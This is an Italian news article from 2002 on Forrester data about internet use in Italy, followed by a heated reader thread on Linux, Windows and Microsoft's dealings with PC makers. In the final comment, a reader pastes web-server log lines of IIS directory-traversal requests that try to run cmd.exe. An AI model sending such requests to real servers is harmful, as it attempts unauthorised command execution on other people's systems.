Roma – Per anni si è avuto modo di lamentarsi delle politiche tariffarie che hanno penalizzato la connettività ad internet e dunque l’uso della rete eppure, secondo i dati rilevati da uno dei più autorevoli osservatori sul settore, quello di Forrester Research, l’Italia è il terzo paese per diffusione di internet in Europa.
Forrester Research ha preso l’Italia come caso straordinario perché in controtendenza nel meridione d’Europa, dove più difficoltoso è stato fin qui lo sviluppo della rete.
Il rapporto di Forrester – “Italy Jumps Europès North-South Divide” – parte dalla considerazione che sarebbero ben 18 milioni gli adulti italiani che si connettono abitualmente alla rete. Cifre che non comprendono quindi quella parte di utenti che non ha ancora raggiunto la maggiore età. Un dato decisamente sorprendente se si considera che solo poche settimane fa Onetone in collaborazione con Doxa aveva realizzato uno studio secondo cui gli italiani sopra i 15 anni che si collegano ad internet almeno una volta al mese nel gennaio del 2002 non superava quota 9,5 milioni. Una tale differenza nel “conteggio” che non sembra poter essere giustificata dai diversi metodi di rilevazione.
Ad ogni modo, secondo Forrester l’Italia proviene da mesi in cui la diffusione dell’accesso è aumentato esponenzialmente. Nell’ultimo semestre, spiegano gli esperti dell’osservatorio, si è avuto un aumento del 9 per cento nel numero dei collegati adulti, un dato che viene considerato un “balzo”.
“Se la Scandinavia e la Svizzera sono ancora avanti – sostiene Forrester – l’Italia sta colmando la distanza con un secondo anno di crescita rapida”. Un balzo, dunque, che ha consentito di scavalcare la Francia in quanto a numero di utenti internet rispetto al totale della popolazione.
“Sono ormai lontani i tempi del secondo trimestre del 2000 – scrivono i ricercatori – in cui l’Italia soffriva di una diffusione della rete limitata al 13 per cento”. Un ruolo importante in questa crescita lo giocano anche i cellulari e più in generale la connettività wireless che sta conoscendo secondo Forrester un rapido sviluppo nel nostro paese. In particolare negli ultimi due trimestri del 2001 le analisi degli esperti parlano di un aumento dal 78 all’87 per cento nell’uso delle tecnologie wireless e dal 47 al 58 per cento nell’uso del personal computer nelle famiglie.
La crescita nell’uso delle nuove tecnologie, considerata “esponenziale”, secondo Forrester si traduce in una promessa per l’aumento del volume di affari del commercio elettronico, un settore che fino a questo momento in Italia ha dovuto soffrire, collocandosi ad un livello molto inferiore rispetto alle medie europee. Solo l’11 per cento degli italiani, infatti, ha effettuato acquisti sulla rete mentre la media dei cittadini europei è del 32 per cento.
Alcuni dei dati forniti da Forrester in questo senso ricordano, pur con alcune differenze, quelli di cui ha di recente parlato l’Istat , l’istituto italiano di statistica. L’Istat aveva infatti disegnato una mappa non incoraggiante per quanto riguarda l’adozione dell’e-commerce persino nelle imprese mentre aveva promosso a pieni voti la diffusione del personal computer, considerata però “non sufficiente”.
-
Compro harware compatibili con "TUTTI" i sistemi.
Mi dispiace, ma io oramai acquisto software che sia compabitibile con diversi sistemi (il "TUTTI" del post è eronico).In generale hardware di ottima qualità è compatibile sia con sistemi Microsoft, Linux, Mac OS etc...Purtroppo alcuni produttori di hardware anche di ottima fattura NON includono o VOGLIONO includere supporto per Linux, l'importante prima di effettuare un'acquisto è oltre a valutare rapporto/prezzo/qualità del prodotto anche se questo supporta svariati sistemi operativi.Perchè io voglio che la mia stampante/scanner/o altro funzioni egregiamente sia sotto il mio vecchio windows che sia sotto il mio caro linux.Ciao!AnonimoRe: Compro harware compatibili con
ho appena installato mandrake 8.2 e' la mia prima volta con linux e con enorme dispiacere devo dire che non e' possibile utilizzare:il mio caro TA USB,il vecchio modem 56k,la stampanteMi dispiace molto ma di certo non posso riacquistare queste periferiche e allora in primo luogo non posso navigare con Linux.mi direte: e chi se ne frega? a me dispiace pero'.. tra l'altro il mouse (logitec optical wheel mouse) e' mooolto piu' lento e "pesante" che con Windows ma forse trovero' il rimedio a questo...AnonimoRe: Compro harware compatibili con
- Scritto da: qws> ho appena installato mandrake 8.2 e' la mia> prima volta con linux e con enorme> dispiacere devo dire che non e' possibile> utilizzare:> > il mio caro TA USB,> il vecchio modem 56k,> la stampanteIo scommetto che se cerchi un po' in giro la maniera per farli girare la trovi. Io non ho trovato ancora niente che non sono riuscito a far funzionare sotto linux, e non sono un guru o presunto tale. Quante volte capita che il plug and play di Win faccia acqua? Poi bisogna rimediare. Idem per linux.> Mi dispiace molto ma di certo non posso> riacquistare queste periferiche e allora in> primo luogo non posso navigare con Linux. > mi direte: e chi se ne frega? a me dispiace> pero'.. > > tra l'altro il mouse (logitec optical wheel> mouse) e' mooolto piu' lento e "pesante" che> con Windows ma forse trovero' il rimedio a> questo...Oltretutto devi considerare che stai facendo girare un kernel generico come quello della Mandrake. Prova a scaricare i sorgenti, adattare il tutto al tuo hardware (tranquillo si fa tutto con tool grafici se vuoi) e ricompilare vedrai che differenza.Ormai non c'e' quasi nulla che non giri sotto linux. Puo' far cilecca il plug and play ma si rimedia sempre.AnonimoRe: Compro harware compatibili con
QWS: Dai una bella ricerca, una ricompilata, una patchata e sei a posto.. cosa aspetti?!Sotto linux gira quasi tutto, e' giunto il momento di imparare nuove cose e di arricchire la tua cultura informatica.AuguriAnonimoRe: Compro harware compatibili con
- Scritto da: qws> ho appena installato mandrake 8.2 e' la mia> prima volta con linux e con enorme> dispiacere devo dire che non e' possibile> utilizzare:> > il mio caro TA USB,Che modello? Si _dice_ che il supporto per USB e' migliorato nell'ultima Mandrake.> il vecchio modem 56k,L'_unico_ caso in cui puoi avere problemi e' se hai un Winmodem. Se e' cosi', incrocia le dita e vai su http://www.linmodems.org/.> la stampanteHu? Marca, modello, parallela o USB?> tra l'altro il mouse (logitec optical wheel> mouse)Avevo un Logitech optical e non mi dava alcun problema (del tutto trasparente).Non e' che devi "aggiustare" le proprieta' del mouse.AnonimoRe: Compro harware compatibili con
- Scritto da: qws> ho appena installato mandrake 8.2 e' la mia> prima volta con linux e con enormeSe e' la prima volta e' meglio che leggi un po' di documentazione.E' molto importante sapere quello che si sta facendo, ma anche il perche' di quello che si sta facendo.> > il mio caro TA USB,> il vecchio modem 56k,http://www.ziobudda.net//hwil/> la stampantehttp://www.linuxprinting.org/programmi e aggiornamentihttp://www.rpmfind.net/oppure un piccola ricerca tra i gruppi (newsgroups) su google.CiaoFabioAnonimoRe: Compro harware compatibili con
- Scritto da: qws> ho appena installato mandrake 8.2 e' la mia> prima volta con linux e con enorme> dispiacere devo dire che non e' possibile> utilizzare:> > il mio caro TA USB,Io lo uso, è impossibile o forse non sei capace tu? Non dico che sia facilissimo da installare eh....> il vecchio modem 56k,winmodem? Ne ho visti funzionare molti,,,> la stampanteCups ha un supporto praticamente completo....CiaoAnonimoNon e' chiaro, non e' chiaro
C'e' qualcosa di chiaro e sicuro o sono solo chiacchere?AnonimoAcquirenti, sveglia!!!
Non comprate le offerte con tutti i software in bundle!E' un bidone! Vi sembra di fare un affare e poi scoprite che:* non vi danno il cd dei s.o. che comprate* questi software stanno su una partizione a parte (così col cavolo che sfruttate tutto il disco fisso che avete comprato* l'assistenza fa pena perché non si capisce se la fa il venditore o M$* Vi rifilano hardware di pessima qualitàVale la pena comprare una cosa del genere?Scegliete l'hardware giusto e il softwae giusto, non fatevi fregare.Se la gente comprasse in questo modo non ci sarebbero i windowspreinstallati e col cavolo che M$ potrebbe fare pressione suivenditori....AnonimoRe: Acquirenti, sveglia!!!
- Scritto da: fDiskolo> * non vi danno il cd dei s.o. che comprate> * questi software stanno su una partizione> a parte (così col cavolo che> sfruttate tutto il disco fisso che avete> compratoE' vero, queste sono 2 cose agghiaccianti!!! Se ti si rompe l'hard disk, oltre che comprarne uno nuovo devi riacquistare anche il sistema operativo...AnonimoRe: Acquirenti, sveglia!!!
- Scritto da: fDiskolo> Non comprate le offerte con tutti i software> in bundle!> > E' un bidone! Vi sembra di fare un affare e> poi scoprite che:> > * non vi danno il cd dei s.o. che comprate> * questi software stanno su una partizionePurtroppo molti considerano un pc come un'eletrodomestico, un forno a microonde.Be', quando impareranno...CiaoFabioAnonimoRe: Acquirenti, sveglia!!!
Il PC DEVE diventare diffuso e semplice come un forno o come qualsiasi altro elettrodomestico. Perché continuate a pensare che debba essere considerato una macchina per soli "addettiai lavori"? - Scritto da: Fabio> > > - Scritto da: fDiskolo> > Non comprate le offerte con tutti i> software> > in bundle!> > > > E' un bidone! Vi sembra di fare un affare> e> > poi scoprite che:> > > > * non vi danno il cd dei s.o. che comprate> > * questi software stanno su una > partizione> > Purtroppo molti considerano un pc come> un'eletrodomestico, un forno a microonde.> Be', quando impareranno...> Ciao> FabioAnonimoRe: Acquirenti, sveglia!!!
- Scritto da: Un addetto ai lavori> Il PC DEVE diventare diffuso e semplice come> un forno o come qualsiasi altro> elettrodomestico. Perché continuate a> pensare che debba essere considerato una> macchina per soli "addettiai lavori"? perche' se permetti vorrei farci qualcosa di piu' che impostare un tempo di cottura e premere "accendi"... ma la maggior parte della gente lo vuole proprio come un forno.AnonimoVergogna!!
Passare alle minacce per paura di affondare... Si sono resi conto che il loro impero sta tremando e fanno la voce grossa...Avete sentito che uscirà XP se? Ma come, non era perfetto!AnonimoRe: Vergogna!!
- Scritto da: MDK> Passare alle minacce per paura di> affondare... Si sono resi conto che il loro> impero sta tremando e fanno la voce> grossa...> Avete sentito che uscirà XP se? Ma come, non> era perfetto!Perchè allora è uscito Mandrake 8.2 (solo un esempio, vale x tutte le distribuzioni)? Non è un SO perfetto?AnonimoRe: Vergogna!!
- Scritto da: decoder> > > - Scritto da: MDK> > Passare alle minacce per paura di> > affondare... Si sono resi conto che il> loro> > impero sta tremando e fanno la voce> > grossa...> > Avete sentito che uscirà XP se? Ma come,> non> > era perfetto!> > Perchè allora è uscito Mandrake 8.2 (solo un> esempio, vale x tutte le distribuzioni)? Non> è un SO perfetto? Perche' i software che mettono insieme al tutto (svariate centinaia) vengono aggiornati.....=)AnonimoRe: Vergogna!!
Eh. Già. Invece Windows no.- Scritto da: KILLALL> > > - Scritto da: decoder> > > > > > - Scritto da: MDK> > > Passare alle minacce per paura di> > > affondare... Si sono resi conto che il> > loro> > > impero sta tremando e fanno la voce> > > grossa...> > > Avete sentito che uscirà XP se? Ma> come,> > non> > > era perfetto!> > > > Perchè allora è uscito Mandrake 8.2 (solo> un> > esempio, vale x tutte le distribuzioni)?> Non> > è un SO perfetto? > > Perche' i software che mettono insieme al> tutto (svariate centinaia) vengono> aggiornati.....=)AnonimoRe: Vergogna!!
- Scritto da: decoder....> Perchè allora è uscito Mandrake 8.2 (solo un> esempio, vale x tutte le distribuzioni)? Non> è un SO perfetto? Nulla è perfetto (tranne l'ultima versione di qualsiasi sw M$...) ma tutto e migliorabile. Compreso Mdk 8.2 (visto soprattutto le due serate che ho dovuto trascorrere, scomodando tutti i santi del paradiso, per farlo funzionare dopo che avevo aggiornato il sistema dalla Mdk 8.1 .....)AnonimoRe: Vergogna!!
- Scritto da: MDK> Avete sentito che uscirà XP se? Ma come, non> era perfetto!solo una domanda;tu usi XP? Cioe'.. lo conosci, lo hai usato per lavorare, giocare o fare quel che fai a lungo al punto di poterne parlare oppure il tuo era un intervento estemporaneo come un brufolo da scoppiare?AnonimoRe: Vergogna!!
> solo una domanda;> tu usi XP? Io, per esempio, l'ho installato. E' durato giusto un giorno. tanto per cominciare ho impiegato quasi un'ora (o forse più) per la sola installazione, contro i normali 20 minuti (comprensivi di aggiornamento dei driver) per win98. Vabbè...Il boot era lentissimo, almeno il doppio di win98. Vabbè...Non erano compatibili, ahimè, i driver della scheda video (una Nvidia 32mb TNT2), lo scanner parallelo, e il modem. Vabbè...Io col computer, oltre a smanettare, ci lavoro e uso Visual Basic, Borland C e altre cosucce. Inutile dire che i 'vecchi' programmi di compilazione 'non erano adatti al nuovo sistema operativo'... Vabbè...Per poter usufruire di driver compatibili avrei dovuto collegarmi al sito microsoft e scaricare gli aggiornamenti... Ma come facevo se il modem non aveva i driver? Vabbè...L'ho provato giusto una giornata per capire cosa avrebbe potuto offrirmi di più rispetto al win98 con le mie necessità.Finita la prova l'ho disinstallato senza pentimento. Che si attacchino. Un computer deve risolvere I MIEI PROBLEMI, non quelli economici di Bill...AnonimoRe: Vergogna!!
> Io, per esempio, l'ho installato. E' durato> giusto un giorno. se hai un computer vecchio e' giusto che usi un OS vecchio.Monta la Mandrake 8.0 su un 486. con Gnome e StarOffice e poi parliamone.Se hai un computer nuovo e molta ram allora non usare XP e' un suicidio.Se usi un pc vecchio, e periferiche vecchie, non puoi pretendere che funzionino senza driver.3dfx ad esempio non rilascia driver da anni e allora? cosa dovrebbero fare i sistemi operativi? non andare avanti perche' la 3dfx e' fallita?Win98 rimane un gran sistema ma per un computer nuovo e' insufficiente e obsoleto (ha 5 anni!) ma serve davvero dirlo?Come puoi pretendere che un sistema nato per computer nuovi e veloci funzioni col tuo catorcio ? :))))))))))))ciao!AnonimoRe: Vergogna!!
- Scritto da: Zot!> - Scritto da: MDK> > Avete sentito che uscirà XP se? Ma come,> non> > era perfetto!> > solo una domanda;> > tu usi XP? > > Cioe'.. lo conosci, lo hai usato per> lavorare, giocare o fare quel che fai a> lungo al punto di poterne parlare oppure il> tuo era un intervento estemporaneo come un> brufolo da scoppiare? Un brufolo da scoppiare? Bhè, non mi metto nemmeno a discutere... rimani chiuso nel buio del tuo sistema e lotta contro i mulini a vento... intanto arrichisci zio Bill!AnonimoDubbi...
Ora mi chiedo: esistono prove di quanto afferma Red Hat oppure è un modo per tentare di scardinare Microsoft? Non riesco a capire da che parte è la verità.AnonimoRe: Dubbi...
- Scritto da: Barbara> Ora mi chiedo: esistono prove di quanto> afferma Red Hat oppure è un modo per tentare> di scardinare Microsoft? Non riesco a capire> da che parte è la verità.Non so se ci siano prove, ma la questione della Dell non è la prima volta che salta fuori.....AnonimoRe: Dubbi...
- Scritto da: TeX> > > - Scritto da: Barbara> > Ora mi chiedo: esistono prove di quanto> > afferma Red Hat oppure è un modo per> tentare> > di scardinare Microsoft? Non riesco a> capire> > da che parte è la verità.> > Non so se ci siano prove, ma la questione> della Dell non è la prima volta che salta> fuori.....La questione di DELL e' attualmente dibattuta in tribunale all'interno della causa antitrust promossa da alcuni stati USA.Il punto fondamentale non e' che M$ abbia fatto accordi di esclusivita' (io ti do il mio SO a prezzo stracciato e tu non avrai altro SO al di fuori del mio) ma che abbia imposto l'esclusivita' sfruttando la posizione dominante.AnonimoRe: Dubbi...
verità o no se la quasi totalità del mercato utenza richiede Win per compatibilità dei vari software, ne esce un monopolio, ovvio che l'entità dominante esercita pressione sui distributori per bloccare la concorrenza.Trova un concessionario Fiat che 15 anni fa potesse avere anche un mandato concorrente, quasi impossibile, oggi invece, venuta meno o praticamente azzerata la dominanza.... alla fine è sempre questione di mercato che stupido non è ma molto "interessato".Uso Win per la compatibilità e semplicità, uso Linux per simpatia ed entrambe hanno diritto ad esiste, entrambe agiranno o si lamenteranno l'una dell'altra.AnonimoAveta fatto confusione
Era Gateway quello che ha detto che M$minacciava d non pagargli più la pubblicitàse avessero venduto macchine con Linux.Red hat ha detto che Linux non ha potutorappresentare una alternativa perchèMicrosoft non ha sviluppato una versionedi Office e di Internet Explorer per Linux.Se ne desumono due cose:1) M$ paga la pubblicità ai costruttori di PC2) A Linux servono M$ Office e M$ Internet Explorer. Ma Netscape? Opera? Mozilla? StarOffice?OpenOffice? AbigeatoWord?AnonimoRe: Aveta fatto confusione
Ma Netscape? Mozilla?StarOffice? OpenOffice? Sarà forse per il fatto che questi prog sono penosi?AnonimoRe: Aveta fatto confusione
- Scritto da: Matteo> Ma Netscape? Mozilla?> StarOffice? OpenOffice? > > Sarà forse per il fatto che questi prog sono> penosi?> Talmente penosi che molti gli utilizzano anche sotto Windows....AnonimoRe: Aveta fatto confusione
- Scritto da: TeX> Talmente penosi che molti gli utilizzano> anche sotto Windows....liel'havevo gia' dettho io ma non mi a creduto!!AnonimoRe: Aveta fatto confusione
- Scritto da: Matteo> Ma Netscape? Mozilla?> StarOffice? OpenOffice? > > Sarà forse per il fatto che questi prog sono> penosi?Mozilla è MOOOLTO meglio di IE. Provare per credere.AnonimoRe: Aveta fatto confusione
- Scritto da: Matteo> Ma Netscape? Mozilla?> StarOffice? OpenOffice? > > Sarà forse per il fatto che questi prog sono> penosi?a questo punto ho una curiosita'...sapresti trovarmi un programma microsoft che ha un corrispondente non microsoft che a tuo parere e' migliore dell'implementazione microsoft ?AnonimoRe: Aveta fatto confusione
> a questo punto ho una curiosita'...> sapresti trovarmi un programma microsoft che> ha un corrispondente non microsoft che a tuo> parere e' migliore dell'implementazione> microsoft ?Tutti i programmi definiti server:Exchange, SQL Server, ISA, IIS, ectDa qui la distinzione che ho sempre fatto: Client -> MicrosoftServer -> Unix (quindi anche Linux)AnonimoRe: Sono tutte cavolate
piccoli problemi... a me sembra che windows ne crei monti di piu e molto piu' grossi...AnonimoRe: Sono tutte cavolate
Non provi Linux dalla versione 1.0 di RedHat o cosa????? Non è molto più difficile di Windows, anzi, sotto certi punti di vista è più facile.Ma a parte questo. Ibm può vendere quello che vuole, da Mac a Unix Hp. Ovviamente al principiante non consiglierà Hp, ma POTRA' SCEGLIERE.Io se vedo una mela marcia dal fruttivendolo non mi sento obbligato a comprarla. Ne scelgo un'altra e il problema è risolto. Non dico mai "le mele del mio fruttivendolo non funzionano", caso mai mi dico "sono un cretino" perchè ne ho comprata una marcia.Anonimo"Anni di ricerca e sviluppo"...
...per fare il porting di Office sotto Linux? A parte il fatto che basterebbero Word ed Excel (voglio proprio vedere chi sarebbe quel folle che userebbe Access col pinguino) ma se per fare un misero porting ci mettono così tanto allora per sviluppare una nuova versione quanto ci mettono, un'era glaciale?Ah, forse è per questo che da Office 95 ad oggi è cambiato solo il colore delle toolbar e poco altro...AnonimoRe:
> Ah, forse è per questo che da Office 95 ad> oggi è cambiato solo il colore delle toolbar> e poco altro...dimentichi l'integrazione con il sistema operativo e con internet explorer...word fra un po fara anche un browser e un file manager...AnonimoRe:
- Scritto da: blah> > Ah, forse è per questo che da Office 95 ad> > oggi è cambiato solo il colore delle> toolbar> > e poco altro...> dimentichi l'integrazione con il sistema> operativo e con internet explorer...word fra> un po fara anche un browser e un file> manager...Dove sei vissuto fin'ora? E' *gia'* cosi'.SalutiAnonimodehehe!
- Scritto da: Ender> ci mettono così tanto allora per sviluppare> una nuova versione quanto ci mettono, un'era> glaciale?ovviamente non sai che linux e' un sistema libero e quindi ha bisogno di un periodo di riadattamento per accettare office altrimenti c'e' il rigetto e quindi la soluzione e' dare office sotto gpl e aspettare che la grande comunita' linux faccia il port come sempreAnonimoRe:
- Scritto da: Ender> ...per fare il porting di Office sotto> Linux? A parte il fatto che basterebbero> Word ed Excel (voglio proprio vedere chi> sarebbe quel folle che userebbe Access col> pinguino) ma se per fare un misero porting> ci mettono così tanto allora per sviluppare> una nuova versione quanto ci mettono, un'era> glaciale?Forse il vero problema non e' il porting di Word o Excel, ma di cio' che ci sta attorno.Ad esempio, hanno problemi per fare il porting del "Blue Screen of Death".Inoltre non e' molto bene implementata quella funzione che permette al sistema di crashare assieme a Word, credo che sotto Windows si chiami "integrazione col sistema operativo".Mi hanno detto che sotto Linux il sistema ha la cattiva tendenza a rimanere impassibile di fronte agli eventuali crash delle applicazioni, e non costringe a riavviare. Cio' e' male! ^__^> Ah, forse è per questo che da Office 95 ad> oggi è cambiato solo il colore delle toolbar> e poco altro...Non e' vero!E' cambiato il formato dei file, ad ogni versione vengono opportunamente rimescolate tutte le specifiche per far si che tutti i documenti scritti con W95 non siano apribili con W2k o WXP e viceversa.Cosi' tutti hanno la "possibilita" di aggiornarsi!!!E' un lavoro lungo, e richiede i suoi tempi! ^__^AnonimoRe:
- Scritto da: Ender> ...per fare il porting di Office sotto> Linux? Occorrerebbe in primo luogo avere una UI consistente con quella prevista da Office (ossia Windows). Poi occorrerebberotutte le API di Windows che Office usa.Quindi occorrerebbe modificare la gestionedei processi di linux per renderla similea quella di Windows, integrare dentroLinux Internet Explorer (dato che il motore di rendering html di IE viene usato pesantemente in tutte le applicazioni Microsoft). Implementare il DOM XML di Microsoft su Linux, una spruzzatina di MAPI e alla fine cosa avremmo?Un Linux che funziona esattamente come Windows.Ha senso una cosa del genere?AnonimoRe:
- Scritto da: Ender> ...per fare il porting di Office sotto> Linux? A parte il fatto che basterebbero> Word ed Excel (voglio proprio vedere chi> sarebbe quel folle che userebbe Access col> pinguino) ma se per fare un misero portingMisero porting (!)> ci mettono così tanto allora per sviluppare> una nuova versione quanto ci mettono, un'era> glaciale?Mozilla è stato rilasciato open a Marzo 97(mi sembra di ricordare) eppure di definitivo non è ancora uscito nulla.AnonimoRe:
- Scritto da: Marco> > Mozilla è stato rilasciato open a Marzo> 97(mi sembra di ricordare)Mese giusto, anno sbagliato (98)> eppure di> definitivo non è ancora uscito nulla.Mozilla è stato _sviluppato_ a partire da quei sorgenti non si tratta di porting, se vuoi fare un confronto prendi Netscape 4.5 e Mozilla 0.9.9 e vedi il lavoro che è stato fatto in questi anni.AnonimoRe:
e perché non ti fai un giro su www.mozilla.org ?così, tanto per aggiornarti un po'!ciaogodzAnonimoRe: Sono tutte cavolate
- Scritto da: Tux>> Immagino già il calo delle vendite dei loro> PC nel caso vendessero i loro computer con> sopra installato Linux.Sicuramente la RH non si aspetta che la Dell venda le sue macchine con _solo_ Linu preinstallato, ma si lamenta che non ci sia neppure la possibilita' di avere un sistema in dual boot !Personalmente sono un SuSE-fanatico :), ma i servers Dell acquistati dalla mia ditta con Linux RH preinstallato funzionavano egregiamente !> La realtà, e sono obiettivo, è che Linux non> è ancora pronto... ci sono ancora TROPPE> cose da risolvere nell'interfaccia utente> (parlo della GUI) e nell'installazione (che> richiede un livello di conoscenza> medio-alto).Vero, pero' dateci la possibilita' di scegliere ! Dopo quasi 6 mesi di battaglie, sono riuscito a farmi rimborsare _parzialmente_ il software preinstallato sul mio Dell Inspiron 8100. Se calcolo le ore spese nello spedire lettere e EMail, mi conveniva tenermi la licenza di WinME (Mai usata) nonostante sulla macchina giri Linux.Anonimolotta ai monopolisti imperialisti
Solo dei ragazzini ignoranti e manageresaltati possono scegliere volontariamentedi abbracciare l'imperialismo di microsoft, abbindolati dal marketing.Chi parla male di linux non l'ha mai utilizzato.L'ignoranza dilaga, in TV non c'e`cultura,si riduce la spesa per la ricerca scientificae nessuno dice niente, mentre se un calciatore ultrapagato canna un tiro scoppianoputiferi, sprange, scazzottamenti, danni...italiani, siamo un popolo di ignoranti,abbiamo politici ignoranti, ce lo meritiamo,io vorrei sapere con questi presuppostiquanto puo` essere oculata la scelta di regalare i dati dei ministeri dellapubblica amministrazione alla micro$oftin cambio di tangenti.Pian pianino i grossi capitali sono riusciti a mettere fuori usoanche Di Pietro, hanno smantellatoil pool di mani pulite, e ci culliamonelle false statistiche della forrestersenza renderci conto che in quasi tutti i PC italiani NON C'E` software italiano,in piccola parte forse c'e` europeo,e se micro$$$oft decide di triplicareil prezzo di office noi italiani siamochinati a 90 gradi pronti a farci sodomizzareovviamente pagando con i soldi pubblici.Manca la competenza, la gente usa micro$oftperche` e` stupida, ignorante, nonha e non vuole avere la competenza necessariafosse solo per distinguere tra un virused un malfunzionamento di un programma.Pochi qui si rendono contodi cosa voglia dire che Micro$$oft detieneil copyright dei formati proprietari dei LORO datiIGNORANTI IGNORANTI IGNORANTI Pino SilvestreAnonimoRe: lotta ai monopolisti imperialisti
Son sante siffatte parole!Amen.AnonimoRe: lotta ai monopolisti imperialisti
Grazie per averci dimostrato che esistono ancora i frustrati.- Scritto da: Pino Silvestre> Solo dei ragazzini ignoranti e manager> esaltati possono scegliere volontariamente> di abbracciare l'imperialismo di microsoft,> abbindolati dal marketing.> > Chi parla male di linux non l'ha mai > utilizzato.> > L'ignoranza dilaga, in TV non c'e`cultura,> si riduce la spesa per la ricerca scientifica> e nessuno dice niente, mentre se un > calciatore ultrapagato canna un tiro> scoppiano> putiferi, sprange, scazzottamenti, danni...> > italiani, siamo un popolo di ignoranti,> abbiamo politici ignoranti, ce lo meritiamo,> io vorrei sapere con questi presupposti> quanto puo` essere oculata la scelta di > regalare i dati dei ministeri della> pubblica amministrazione alla micro$oft> in cambio di tangenti.> > Pian pianino i grossi capitali > sono riusciti a mettere fuori uso> anche Di Pietro, hanno smantellato> il pool di mani pulite, e ci culliamo> nelle false statistiche della forrester> senza renderci conto che in quasi tutti > i PC italiani NON C'E` software italiano,> in piccola parte forse c'e` europeo,> e se micro$$$oft decide di triplicare> il prezzo di office noi italiani siamo> chinati a 90 gradi pronti a farci sodomizzare> ovviamente pagando con i soldi pubblici.> > Manca la competenza, la gente usa micro$oft> perche` e` stupida, ignorante, non> ha e non vuole avere la competenza necessaria> fosse solo per distinguere tra un virus> ed un malfunzionamento di un programma.> > Pochi qui si rendono conto> di cosa voglia dire che Micro$$oft detiene> il copyright dei formati proprietari dei > LORO dati> > IGNORANTI IGNORANTI IGNORANTI > > Pino SilvestreAnonimocentesimo rosso che c vorrebbe dire??
eh?AnonimoRe: centesimo rosso che c vorrebbe dire??
significa in pratica "questi comunisti vogliono soldi".AnonimoRe: centesimo rosso che c vorrebbe dire??
- Scritto da: Vertigo> significa in pratica "questi comunisti> vogliono soldi".Non mi risulta che in RH siano comunisti ne una associazione senza scopo di lucro!I soldoni li vogliono!!!!AnonimoRe: centesimo rosso che c vorrebbe dire??
- Scritto da: cosa significa> eh?Significa "soldi di Red Hat"in analogia con la traduzionedel nome "cappello rosso"AnonimoRe: Sono tutte cavolate
In realtà non dovrebbero offrire solo linux, ma darlo almeno come alternativa a chi non vuole pagare la licenza di windows... non far pagare alla gente quello che tanto poi cancella... se non voglio windows devo essere libero di non acquistarlo, e non trovare la licenza obbligatoriamente legata alla macchina che compro...AnonimoRe: Sono tutte cavolate
- Scritto da: Tux> Premetto che non sono un fanatico di Bill> Gates, ma certo non me la sento di dare> torto a Dell, IBM, Compaq etc...Non faccio commenti di nessun tipo, ma cito una esperienza da poco avuta...Sono da poco passato da un Athlon 1000 a un 1800+. Ovviamente ho cambiato scheda madre...C'era installato un multi-boot con una Slack e un win2k pro.Cambio M/B, CPU e RAM. Riattacco tutto, dò corrente.Ok, lancio linux. Avvio quasi ok. Un errore nel caricamento del modulo USB mi dice: "ehi, hai un controller USB diverso dall'ultima volta... che faccio? così non va ve'?" compilo il modulo per quest'altro controller. Modprobe a runtime, non ho nemmeno bisogno di riavviare...E il sistema parte. Finita installazione.Win2k: una schermata in 640*480*16col mi fa entrare nel sistema. La scheda video rifiuta di andare. Poco male, reinstallo i driver. La scheda audio gracchia. Reinstallo i driver: cambia una sega... Ho provato con 4 (quattro...) driver diversi e non gliene frega nulla.Mi sa che stasera lo spiano, m'ha rotto i kugeln... (come si fa la dieresi???)AnonimoRe: Sono tutte cavolate ? Le tue !
- Scritto da: zap> E' il momento di LIBERARE il mercato da un> dittaore economico che impedisce la crescita> del settore.> > E' il momento di attuare una azione civile> di BOICOTTAGGIO dei prodotti microsoft.> > E' ora di chiudere le fonti di alimentazione> di quell'azienda succhia-risorse che è> microsoft: non acquistiamo (e non> diffondiamo neanche illegalmente) il suo> software e i suoi prodotti.> Succhia risorse? quali le tue?Microsoft e i suoi sistemi hanno molti pregi , cosi come linux. Ma un utente medio ha bisogno di:1)Un sistema operativo intuitivo e immediato. Linux non lo è ancora.2)La possibilità di avere consulenza e assistenza. In italiano. Linux non lo fa ancora.3)Un parco software ad ampio respiro e facilmente reperibile. Linux non c'è l'ha ancora.Facilmente con un click. Capiscimi eh...Se invece devi divertirti un po di piu usa LinuxMa anche un'azienda (grossa non la piccola azienda) ha bisogno di un sistema di mercato (consulenti ecc ecc) che Linux e il suo mondo non puo ancora fornire.AnonimoRe: Sono tutte cavolate ? Le tue !
- Scritto da: Reply> Succhia risorse? quali le tue?anche le mie dai un occhiata ai miei log di apache e poi dimmi se posso mandare a M$ il conto della banda:63.236.75.228 - - [25/Mar/2002:13:40:26 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:27 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:28 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:29 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:30 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"63.236.75.228 - - [25/Mar/2002:13:40:31 